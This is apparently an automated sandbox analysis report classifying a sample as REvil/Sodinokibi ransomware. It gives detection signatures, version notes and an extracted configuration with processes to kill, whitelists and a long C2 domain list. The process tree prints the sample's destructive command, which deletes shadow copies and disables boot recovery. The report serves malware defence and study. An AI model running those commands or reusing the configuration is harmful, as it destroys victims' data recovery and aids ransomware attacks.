Edit tour

Windows Analysis Report
myfile.exe

Overview

General Information

Sample name:	myfile.exe
Analysis ID:	1507821
MD5:	aaca0b25fa85ab4507d3861697824343
SHA1:	527c1dc2a340dd48652aec14a6316c7af0ff74c0
SHA256:	6727edbb5d6abee908851a8c5fd7b4aca6d664634fdcdfc15e04502b960abbc5
Tags:	exe
Infos:

Detection

Sodinokibi, Chaos, Netwalker, Revil, TrojanRansom

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Found ransom note / readme

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Sodinokibi

Yara detected Chaos Ransomware

Yara detected Netwalker ransomware

Yara detected Python Ransomware

Yara detected RansomwareGeneric

Yara detected Revil

Yara detected Sodinokibi Ransomware

Yara detected TrojanRansom

AI detected suspicious sample

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Deletes shadow drive data (may be related to ransomware)

Found Tor onion address

Found evasive API chain (may stop execution after checking mutex)

Found potential ransomware demand text

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Posts data to a JPG file (protocol mismatch)

Tries to resolve many domain names, but no domain seems valid

Uses bcdedit to modify the Windows boot settings

Writes a notice file (html or txt) to demand a ransom

Checks for available system drives (often done to infect USB drives)

Connects to many different domains

Connects to several IPs in different countries

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Process Tree

System is w10x64

myfile.exe (PID: 7156 cmdline: "C:\Users\user\Desktop\myfile.exe" MD5: AACA0B25FA85AB4507D3861697824343)

cmd.exe (PID: 7160 cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
REvil, Sodinokibi	REvil BetaMD5: bed6fc04aeb785815744706239a1f243SHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bfSHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45* Privilege escalation via CVE-2018-8453 (64-bit only)* Rerun with RunAs to elevate privileges* Implements a requirement that if "exp" is set, privilege escalation must be successful for full execution to occur* Implements target whitelisting using GetKetboardLayoutList* Contains debug console logging functionality* Defines the REvil registry root key as SOFTWARE\!test* Includes two variable placeholders in the ransom note: UID & KEY* Terminates processes specified in the "prc" configuration key prior to encryption* Deletes shadow copies and disables recovery* Wipes contents of folders specified in the "wfld" configuration key prior to encryption* Encrypts all non-whitelisted files on fixed drives* Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe* Partially implements a background image setting to display a basic "Image text" message* Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)------------------------------------REvil 1.00MD5: 65aa793c000762174b2f86077bdafaeaSHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457SHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc* Adds 32-bit implementation of CVE-2018-8453 exploit* Removes console debug logging* Changes the REvil registry root key to SOFTWARE\recfg* Removes the System/Impersonation success requirement for encrypting network mapped drives* Adds a "wipe" key to the configuration for optional folder wiping* Fully implements the background image setting and leverages values defined in the "img" configuration key* Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT* Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL* Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data------------------------------------REvil 1.01MD5: 2abff29b4d87f30f011874b6e98959e9SHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732cSHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb* Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level* Makes encryption of network mapped drives optional by adding the "-nolan" argument------------------------------------REvil 1.02MD5: 4af953b20f3a1f165e7cf31d6156c035SHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299SHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4* Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage and GetSystemDefaultUILanguage* Partially implements "lock file" logic by generating a lock filename based on the first four bytes of the Base64-decoded pk key, appending a .lock file extension, and adding the filename to the list of whitelisted files in the REvil configuration (It does not appear that this value is referenced after it is created and stored in memory. There is no evidence that a lock file is dropped to disk.)* Enhances folder whitelisting logic that take special considerations if the folder is associated with "program files" directories* Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories* Hard-codes whitelisting of "sql" subfolders within program files* Encrypts program files sub-folders that does not contain "sql" in the path* Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine if they are whitelisted* Encodes stored strings used for URI building within the binary and decodes them in memory right before use* Introduces a REvil registry root key "sub_key" registry value containing the attacker's public key------------------------------------REvil 1.03MD5: 3cae02306a95564b1fff4ea45a7dfc00SHA1: 0ce2cae5287a64138d273007b34933362901783dSHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf* Removes lock file logic that was partially implemented in 1.02* Leverages WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (Previous versions performed this action once.)* Encodes stored shellcode* Adds the -path argument:* Does not wipe folders (even if wipe == true)* Does not set desktop background* Does not contact the C2 server (even if net == true)* Encrypts files in the specified folder and drops the ransom note* Changes the REvil registry root key to SOFTWARE\QtProject\OrganizationDefaults* Changes registry key values from --> to: * sub_key --> pvg * pk_key --> sxsP * sk_key --> BDDC8 * 0_key --> f7gVD7 * rnd_ext --> Xu7Nnkd * stat --> sMMnxpgk------------------------------------REvil 1.04MD5: 6e3efb83299d800edf1624ecbc0665e7SHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0dSHA256: 2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6* Leverages PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (For Windows XP or older, it uses the original command that was executed in all previous REvil versions.)* Removes the folder wipe capability* Changes the REvil registry root key to SOFTWARE\GitForWindows* Changes registry key values from --> to: * pvg --> QPM * sxsP --> cMtS * BDDC8 --> WGg7j * f7gVD7 --> zbhs8h * Xu7Nnkd --> H85TP10 * sMMnxpgk --> GCZg2PXD------------------------------------REvil v1.05MD5: cfefcc2edc5c54c74b76e7d1d29e69b2SHA1: 7423c57db390def08154b77e2b5e043d92d320c7SHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea* Add new 'arn' configuration key that contains a boolean true/false value that controls whether or not to implement persistence.* Implements persistence functionality via registry Run key. Data for value is set to the full path and filename of the currently running executable. The executable is never moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The Reg Value used is the hardcoded value of 'lNOWZyAWVv' : * SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lNOWZyAWVv* Before exiting, REvil sets up its malicious executable to be deleted upon reboot by issuing a call to MoveFileExW and setting the destination to NULL and the flags to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). This breaks persistence however as the target executable specified in the Run key will no longer exist once this is done.* Changes registry key values from --> to: * QPM --> tgE * cMtS --> 8K09 * WGg7j --> xMtNc * zbhs8h --> CTgE4a * H85TP10 --> oE5bZg0 * GCZg2PXD --> DC408Qp4------------------------------------REvil v1.06MD5: 65ff37973426c09b9ff95f354e62959eSHA1: b53bc09cfbd292af7b3609734a99d101bd24d77eSHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e* Updated string decoding function to break existing yara rules. Likely the result of the blog posted by us.* Modified handling of network file encryption. Now explicitly passes every possible "Scope" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the 'Resource Type" from RESOURCETYPE_DISK to RESOURCETYPE_ANY which will now include things like mapped printers.* Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R'* Changes registry key values from --> to: * tgE --> 73g * 8K09 --> vTGj * xMtNc --> Q7PZe * CTgE4a --> BuCrIp * oE5bZg0 --> lcZd7OY * DC408Qp4 --> sLF86MWC------------------------------------REvil v1.07MD5: ea4cae3d6d8150215a4d90593a4c30f2SHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894eSHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3TBD	Pinchy Spider	http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html http://www.secureworks.com/research/threat-profiles/gold-southfield https://analyst1.com/file-assets/History-of-REvil.pdf https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf https://asec.ahnlab.com/ko/19640/	https://malpedia.caad.fkie.fraunhofer.de/details/win.revil

Name	Description	Attribution	Blogpost URLs	Link
Chaos	In-development ransomware family which was released in June 2021 by an unknown threat actor. The builder initially claimed to be a "Ryuk .Net Ransomware Builder" even though it was completely unrelated to the Ryuk malware family. Presently it appears to contain trojan-like features, but lacks features commonly found in ransomware such as data exfiltration.	No Attribution	https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging https://blog.talosintelligence.com/new-threat-actor-using-yashma-ransomware/ https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree https://brianstadnicki.github.io/posts/malware-chaos-ransomware-v4/ https://labs.k7computing.com/index.php/ransomed-by-warlock-dark-army-officials/	https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos

Name	Description	Attribution	Blogpost URLs	Link
Mailto, NetWalker		No Attribution	https://0x00-0x7f.github.io/Netwalker-from-Powershell-reflective-loader-to-injected-Dll/ https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/ https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/	https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto

Name	Description	Attribution	Blogpost URLs	Link
REvil	REvil BetaMD5: bed6fc04aeb785815744706239a1f243SHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bfSHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45* Privilege escalation via CVE-2018-8453 (64-bit only)* Rerun with RunAs to elevate privileges* Implements a requirement that if "exp" is set, privilege escalation must be successful for full execution to occur* Implements target whitelisting using GetKetboardLayoutList* Contains debug console logging functionality* Defines the REvil registry root key as SOFTWARE\!test* Includes two variable placeholders in the ransom note: UID & KEY* Terminates processes specified in the "prc" configuration key prior to encryption* Deletes shadow copies and disables recovery* Wipes contents of folders specified in the "wfld" configuration key prior to encryption* Encrypts all non-whitelisted files on fixed drives* Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe* Partially implements a background image setting to display a basic "Image text" message* Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)------------------------------------REvil 1.00MD5: 65aa793c000762174b2f86077bdafaeaSHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457SHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc* Adds 32-bit implementation of CVE-2018-8453 exploit* Removes console debug logging* Changes the REvil registry root key to SOFTWARE\recfg* Removes the System/Impersonation success requirement for encrypting network mapped drives* Adds a "wipe" key to the configuration for optional folder wiping* Fully implements the background image setting and leverages values defined in the "img" configuration key* Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT* Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL* Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data------------------------------------REvil 1.01MD5: 2abff29b4d87f30f011874b6e98959e9SHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732cSHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb* Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level* Makes encryption of network mapped drives optional by adding the "-nolan" argument------------------------------------REvil 1.02MD5: 4af953b20f3a1f165e7cf31d6156c035SHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299SHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4* Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage and GetSystemDefaultUILanguage* Partially implements "lock file" logic by generating a lock filename based on the first four bytes of the Base64-decoded pk key, appending a .lock file extension, and adding the filename to the list of whitelisted files in the REvil configuration (It does not appear that this value is referenced after it is created and stored in memory. There is no evidence that a lock file is dropped to disk.)* Enhances folder whitelisting logic that take special considerations if the folder is associated with "program files" directories* Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories* Hard-codes whitelisting of "sql" subfolders within program files* Encrypts program files sub-folders that does not contain "sql" in the path* Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine if they are whitelisted* Encodes stored strings used for URI building within the binary and decodes them in memory right before use* Introduces a REvil registry root key "sub_key" registry value containing the attacker's public key------------------------------------REvil 1.03MD5: 3cae02306a95564b1fff4ea45a7dfc00SHA1: 0ce2cae5287a64138d273007b34933362901783dSHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf* Removes lock file logic that was partially implemented in 1.02* Leverages WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (Previous versions performed this action once.)* Encodes stored shellcode* Adds the -path argument:* Does not wipe folders (even if wipe == true)* Does not set desktop background* Does not contact the C2 server (even if net == true)* Encrypts files in the specified folder and drops the ransom note* Changes the REvil registry root key to SOFTWARE\QtProject\OrganizationDefaults* Changes registry key values from --> to: * sub_key --> pvg * pk_key --> sxsP * sk_key --> BDDC8 * 0_key --> f7gVD7 * rnd_ext --> Xu7Nnkd * stat --> sMMnxpgk------------------------------------REvil 1.04MD5: 6e3efb83299d800edf1624ecbc0665e7SHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0dSHA256: 2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6* Leverages PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (For Windows XP or older, it uses the original command that was executed in all previous REvil versions.)* Removes the folder wipe capability* Changes the REvil registry root key to SOFTWARE\GitForWindows* Changes registry key values from --> to: * pvg --> QPM * sxsP --> cMtS * BDDC8 --> WGg7j * f7gVD7 --> zbhs8h * Xu7Nnkd --> H85TP10 * sMMnxpgk --> GCZg2PXD------------------------------------REvil v1.05MD5: cfefcc2edc5c54c74b76e7d1d29e69b2SHA1: 7423c57db390def08154b77e2b5e043d92d320c7SHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea* Add new 'arn' configuration key that contains a boolean true/false value that controls whether or not to implement persistence.* Implements persistence functionality via registry Run key. Data for value is set to the full path and filename of the currently running executable. The executable is never moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The Reg Value used is the hardcoded value of 'lNOWZyAWVv' : * SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lNOWZyAWVv* Before exiting, REvil sets up its malicious executable to be deleted upon reboot by issuing a call to MoveFileExW and setting the destination to NULL and the flags to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). This breaks persistence however as the target executable specified in the Run key will no longer exist once this is done.* Changes registry key values from --> to: * QPM --> tgE * cMtS --> 8K09 * WGg7j --> xMtNc * zbhs8h --> CTgE4a * H85TP10 --> oE5bZg0 * GCZg2PXD --> DC408Qp4------------------------------------REvil v1.06MD5: 65ff37973426c09b9ff95f354e62959eSHA1: b53bc09cfbd292af7b3609734a99d101bd24d77eSHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e* Updated string decoding function to break existing yara rules. Likely the result of the blog posted by us.* Modified handling of network file encryption. Now explicitly passes every possible "Scope" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the 'Resource Type" from RESOURCETYPE_DISK to RESOURCETYPE_ANY which will now include things like mapped printers.* Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R'* Changes registry key values from --> to: * tgE --> 73g * 8K09 --> vTGj * xMtNc --> Q7PZe * CTgE4a --> BuCrIp * oE5bZg0 --> lcZd7OY * DC408Qp4 --> sLF86MWC------------------------------------REvil v1.07MD5: ea4cae3d6d8150215a4d90593a4c30f2SHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894eSHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3TBD	Pinchy Spider	http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html http://www.secureworks.com/research/threat-profiles/gold-southfield https://analyst1.com/file-assets/History-of-REvil.pdf https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf https://asec.ahnlab.com/ko/19640/	https://malpedia.caad.fkie.fraunhofer.de/details/win.revil

Malware Configuration

Threatname: REvil

{"pk": "jD6pLfwUHlEoWBKadlZ4A78CLm8I0UKlzdzW7XautWE=", "pid": "33", "sub": "357", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["application data", "tor browser", "windows.old", "appdata", "$windows.~bt", "intel", "perflogs", "program files", "programdata", "boot", "msocache", "program files (x86)", "system volume information", "$windows.~ws", "windows", "mozilla", "google", "$recycle.bin"], "fls": ["desktop.ini", "ntuser.dat", "bootfont.bin", "ntldr", "autorun.inf", "ntuser.ini", "ntuser.dat.log", "bootsect.bak", "thumbs.db", "iconcache.db", "boot.ini"], "ext": ["idx", "hta", "icns", "cmd", "wpx", "msp", "msu", "cab", "diagpkg", "spl", "scr", "dll", "themepack", "bin", "prf", "msc", "nls", "msi", "ps1", "mod", "exe", "bat", "adv", "386", "ico", "theme", "ani", "sys", "diagcab", "deskthemepack", "msstyles", "lock", "diagcfg", "ocx", "hlp", "com", "ics", "lnk", "drv", "shs", "rom", "cur", "rtp", "cpl", "key", "icl", "ldf", "nomedia", "mpa"]}, "wfld": ["backup"], "prc": ["thunderbird.exe", "synctime.exe", "dbsnmp.exe", "encsvc.exe", "isqlplussvc.exe", "ocautoupds.exe", "mydesktopqos.exe", "powerpnt.exe", "mysqld.exe", "mydesktopservice.exe", "outlook.exe", "mysqld_nt.exe", "firefoxconfig.exe", "sqbcoreservice.exe", "steam.exe", "sqlbrowser.exe", "infopath.exe", "thebat.exe", "msaccess.exe", "mysqld_opt.exe", "tbirdconfig.exe", "visio.exe", "msftesql.exe", "excel.exe", "oracle.exe", "mspub.exe", "sqlservr.exe", "agntsvc.exe", "onenote.exe", "winword.exe", "thebat64.exe", "dbeng50.exe", "wordpad.exe", "ocssd.exe", "sqlwriter.exe", "ocomm.exe", "sqlagent.exe", "xfssvccon.exe"], "dmn": "parksideseniorliving.net;90nguyentuan.com;enactusnhlstenden.com;avisioninthedesert.com;lashandbrowenvy.com;satoblog.org;rsidesigns.com;pansionatblago.ru;magrinya.net;baikalflot.ru;bd2fly.com;business-basic.de;afbudsrejserallinclusive.dk;m2graph.fr;stanleyqualitysystems.com;altitudeboise.com;lexced.com;chainofhopeeurope.eu;bayshoreelite.com;mursall.de;amelielecompte.wordpress.com;wribrazil.com;testitjavertailut.net;chomiksy.net;vitoriaecoturismo.com.br;georgemuncey.com;funworx.de;nbva.co.uk;c-sprop.com;relevantonline.eu;abulanov.com;maxcube24.com.ua;kenmccallum.com;stage-infirmier.fr;skoczynski.eu;mieleshopping.it;holocine.de;oscommunity.de;ikadomus.com;bundan.com;davedavisphotos.com;activeterroristwarningcompany.com;hostaletdelsindians.es;almamidwifery.com;innervisions-id.com;gazelle-du-web.com;angelsmirrorus.com;efficiencyconsulting.es;vedsegaard.dk;schroederschoembs.com;welovecustomers.fr;11.in.ua;modamarfil.com;look.academy;rhino-storage.co.uk;solutionshosting.co.uk;vdolg24.online;azerbaycanas.com;racefietsenblog.nl;photographycreativity.co.uk;crestgood.com;voetbalhoogeveen.nl;suitesartemis.gr;bodymindchallenger.com;test-teleachat.fr;sjtpo.org;patassociation.com;iron-mine.ru;deduktia.fi;ntinasfiloxenia.gr;banukumbak.com;forextimes.ru;rattanwarehouse.co.uk;mslp.org;wineandgo.hu;happycatering.de;dogsunlimitedguide.com;rubyaudiology.com;bridalcave.com;loparnille.se;fotoeditores.com;dentourage.com;loysonbryan.com;perfectgrin.com;eurethicsport.eu;fann.ru;gavelmasters.com;advanced-removals.co.uk;bluemarinefoundation.com;frankgoll.com;hotjapaneselesbian.com;affligemsehondenschool.be;directique.com;cascinarosa33.it;maryairbnb.wordpress.com;ijsselbeton.nl;ahgarage.com;johnkoen.com;frameshift.it;fascaonline.com;ilveshistoria.com;akwaba-safaris.com;teutoradio.de;therapybusinessacademy.com;natturestaurante.com.br;metallbau-hartmann.eu;vvego.com;airserviceunlimited.com;pedmanson.com;profiz.com;sveneulberg.de;triavlete.com;altocontatto.net;allinonecampaign.com;docarefoundation.org;banksrl.co.za;metroton.ru;kafkacare.com;rentsportsequip.com;zealcon.ae;floweringsun.org;benchbiz.com;carmel-york.com;jacquesgarcianoto.com;artvark.nl;marcandy.com;mondolandscapes.com;greeneyetattoo.com;the5thquestion.com;angelika-schwarz.com;gta-jjb.fr;the3-week-diet.net;wordpress.idium.no;rename.kz;rhino-turf.com;pxsrl.it;flossmoordental.com;dieetuniversiteit.nl;keyboardjournal.com;richardiv.com;grupoexin10.com;margaretmcshane.com;pourlabretagne.bzh;outstandingminialbums.com;slotenmakerszwijndrecht.nl;bratek-immobilien.de;paradigmlandscape.com;motocrossplace.co.uk;subyard.com;palmecophilippines.com;ultimatelifesource.com;zdrowieszczecin.pl;auto-opel.ro;skinkeeper.li;reygroup.pt;putzen-reinigen.com;johnsonweekly.com;boyfriendsgoal.site;leadforensics.com;circuit-diagramz.com;terraflair.de;pvandambv.nl;matthieupetel.fr;biblica.com;bilius.dk;fla.se;jax-interim-and-projectmanagement.com;julielusktherapy.com;specialtyhomeservicesllc.com;skyscanner.ro;betterce.com;lifeinbreaths.com;grancanariaregional.com;iexpert99.com;toranjtuition.org;xrresources.com;justaroundthecornerpetsit.com;alltagsrassismus-entknoten.de;oexebusiness.com;site.markkit.com.br;bookingwheel.com;miscbo.it;invela.dk;peppergreenfarmcatering.com.au;insane.agency;thestudio.academy;jlwilsonbooks.com;ykobbqchicken.ca;colored-shelves.com;carsten.sparen-it.de;tieronechic.com;trivselsguide.dk;nicksrock.com;lunoluno.com;smartspeak.com;stringnosis.academy;greatofficespaces.net;descargandoprogramas.com;prometeyagro.com.ua;globalskills.pt;levelseven.be;bubbalucious.com;hiddensee-buhne11.de;primemarineengineering.com;theintellect.edu.pk;goddardleadership.org;lsngroupe.com;akcadagofis.com;chris-anne.com;azloans.com;zorgboerderijravensbosch.nl;cormanmarketing.com;axisoflove.org:443;marmarabasin.com;xn--80addfr4ahr.dp.ua;hameghlim.com;webforsites.com;successcolony.com.ng;arazi.eus;alexwenzel.de;hotelturbo.de;triplettabordeaux.fr;datatri.be;easydental.ae;kdbrh.com;wademurray.com;pinkxgayvideoawards.com;hoteltantra.com;drbrianhweeks.com;duthler.nl;supercarhire.co.uk;frimec-international.es;quitescorting.com;unboxtherapy.site;leansupremegarcinia.net;adedesign.com;richardmaybury.co.uk;agenceassemble.fr;four-ways.com;o90.dk;druktemakersheerenveen.nl;yourcosmicbeing.com;catchup-mag.com;adabible.org;traitware.com;drnelsonpediatrics.com;subquercy.fr;leijstrom.com;aktivfriskcenter.se;avtoboss163.ru:443;chatberlin.de;dinecorp.com;prodentalblue.com;atelierkomon.com;malevannye.ru;bourchier.org;acibademmobil.com.tr;min-virksomhed.dk;purepreprod4.com;hinotruckwreckers.com.au;alattekniksipil.com;redpebblephotography.com;piestar.com;salonlamar.nl;lumturo.academy;stitch-n-bitch.com;molinum.pt;ilovefullcircle.com;brunoimmobilier.com;indiebizadvocates.org;innovationgames-brabant.nl;pays-saint-flour.fr;foerderverein-vatterschule.de;queertube.net;drbenveniste.com;gaearoyals.com;shortysspices.com;beauty-traveller.com;livedeveloper.com;eksperdanismanlik.com;futurenetworking.com;customroasts.com;cmascd.com;muller.nl;michaelfiegel.com;tecleados.com;dennisverschuur.com;dmlcpa.com;saint-malo-developpement.fr;designimage.ae;manzel.tn;myfbateam.com;sochi-okna23.ru;cl0nazepamblog.com;signededenroth.dk;kartuindonesia.com;xn--billigafrgpatroner-stb.se;proffteplo.com;o2o-academy.com;soncini.ch;gsconcretecoatings.com;the-beauty-guides.com;jobscore.com;omnicademy.com;bg.szczecin.pl;111firstdelray.com;naukaip.ru;log-barn.co.uk;tilldeeke.de;optigas.com;husetsanitas.dk;kroophold-sjaelland.dk;matteoruzzaofficial.com;mollymccarthydesign.com;mangimirossana.it;onlinemarketingsurgery.co.uk;onesynergyinternational.com;deziplan.ru;buonabitare.com;spectamarketingdigital.com.br;annenymus.com;luvbec.com;glende-pflanzenparadies.de;tchernia-conseil.fr;witraz.pl;karelinjames.com;finnergo.eu;dr-vita.de;parseport.com;jayfurnitureco.com;transifer.fr;thegrinningmanmusical.com;achetrabalhos.com;thesilkroadny.com;memphishealthandwellness.com;skooppi.fi;circlecitydj.com;bodet150ans.com;midwestschool.org;springfieldplumbermo.com;augen-praxisklinik-rostock.de;taulunkartano.fi;unexplored.gr;silverbird.dk;speakaudible.com;theboardroomafrica.com;lgiwines.com;cesep2019.com;lovcase.com;alaskaremote.com;kvetymichalovce.sk;trevi-vl.ru;casinodepositors.com;koncept-m.ru;angeleyezstripclub.com;liveyourheartout.co;vapiano.fr;towelroot.co;solidhosting.nl;hom-frisor.dk;projektparkiet.pl;masecologicos.com;baita.ac;juergenblaetz.de;veggienessa.com;startuplive.org;inewsstar.com;jaaphoekzema.nl;girlish.ae;fixx-repair.com;bmw-i-pure-impulse.com;pokemonturkiye.com;edvestors.org;bjornvanvulpen.nl;nginx.com;yourhappyevents.fr;ddmgen.com;boloria.de;molade.nl;lagschools.ng;nvisionsigns.com;bluetenreich-brilon.de;buffdaddyblog.com;entdoctor-durban.com;bellesiniacademy.org;mazzaropi.com.br;bychowo.pl;kryptos72.com;awaitspain.com;forumsittard.nl;mensemetgesigte.co.za;weddingceremonieswithtim.com;agendatwentytwenty.com;barbaramcfadyenjewelry.com;smarttourism.academy;jglconsultancy.com;sachainchiuk.com;schlagbohrmaschinetests.com;daveystownhouse.com;krishnabrawijaya.com;imajyuku-sozoku.com;clemenfoto.dk;kombi-dress.com;agrifarm.dk;rizplakatjaya.com;laaisterplakky.nl;cac2040.com;turing.academy;qandmmusiccenter.com;envomask.com;housesofwa.com;wasnederland.nl;hepishopping.com;hm-com.com;nevadaruralhousingstudies.org;teamsegeln.ch;bcabattoirs.org;christianscholz.de;buerocenter-butzbach-werbemittel.de;oncarrot.com;walterman.es;scentedlair.com;alene.co;cc-experts.de;sweetz.fr;irizar.com;unislaw-narty.pl;palema.gr;atma.nl;thenalpa.com;qwikcoach.com;arearugcleaningnyc.com;cincinnatiphotocompany.org;blucamp.com;fanuli.com.au;heimdalbygg.no;evsynthacademy.org;finsahome.co.uk;dnqa.co.uk;comoserescritor.com;techybash.com;parisschool.ru;singletonfinancial.com;ziliak.com;limmortelyouth.com;bertbutter.nl;hawthornsretirement.co.uk;albcleaner.fr;etgdogz.de;acb-gruppe.ch;larchwoodmarketing.com;tothebackofthemoon.com;kelsigordon.com;tradenavigator.ch;jobkiwi.com.ng;arthakapitalforvaltning.dk;switch-made.com;mneti.ru;atrgroup.it;eventosvirtualesexitosos.com;eos-horlogerie.com;gardenpartner.pl;kookooo.com;heuvelland-oaze.nl;domilivefurniture.com;computer-place.de;stralsund-ansichten.de;carolynfriedlander.com;charlesfrancis.photos;5pointpt.com;sunsolutions.es;shortsalemap.com;ceocenters.com;plbinsurance.com;martinipstudios.com;chorusconsulting.net;internalresults.com;mariajosediazdemera.com;werkzeugtrolley.net;electricianul.com;tweedekansenloket.nl;chinowarehousespace.com;cmeow.com;hawaiisteelbuilding.com;volta.plus;theatre-embellie.fr;zumrutkuyutemel.com;ingresosextras.online;diakonie-weitramsdorf-sesslach.de;web865.com;alwaysdc.com;kemtron.fr;malzomattalar.com;drvoip.com;aidanpublishing.co.uk;sppdstats.com;gbk-tp1.de;omegamarbella.com;ya-elka.ru;lookandseen.com;ufovidmag.com;jameswilliamspainting.com;rivermusic.nl;amorbellezaysalud.com;paardcentraal.nl;bohrlochversicherung.info;brannbornfastigheter.se;precisetemp.com;schluesseldienste-hannover.de;powershell.su;awag-blog.de;monstarrsoccer.com;speiserei-hannover.de;enews-qca.com;klapanvent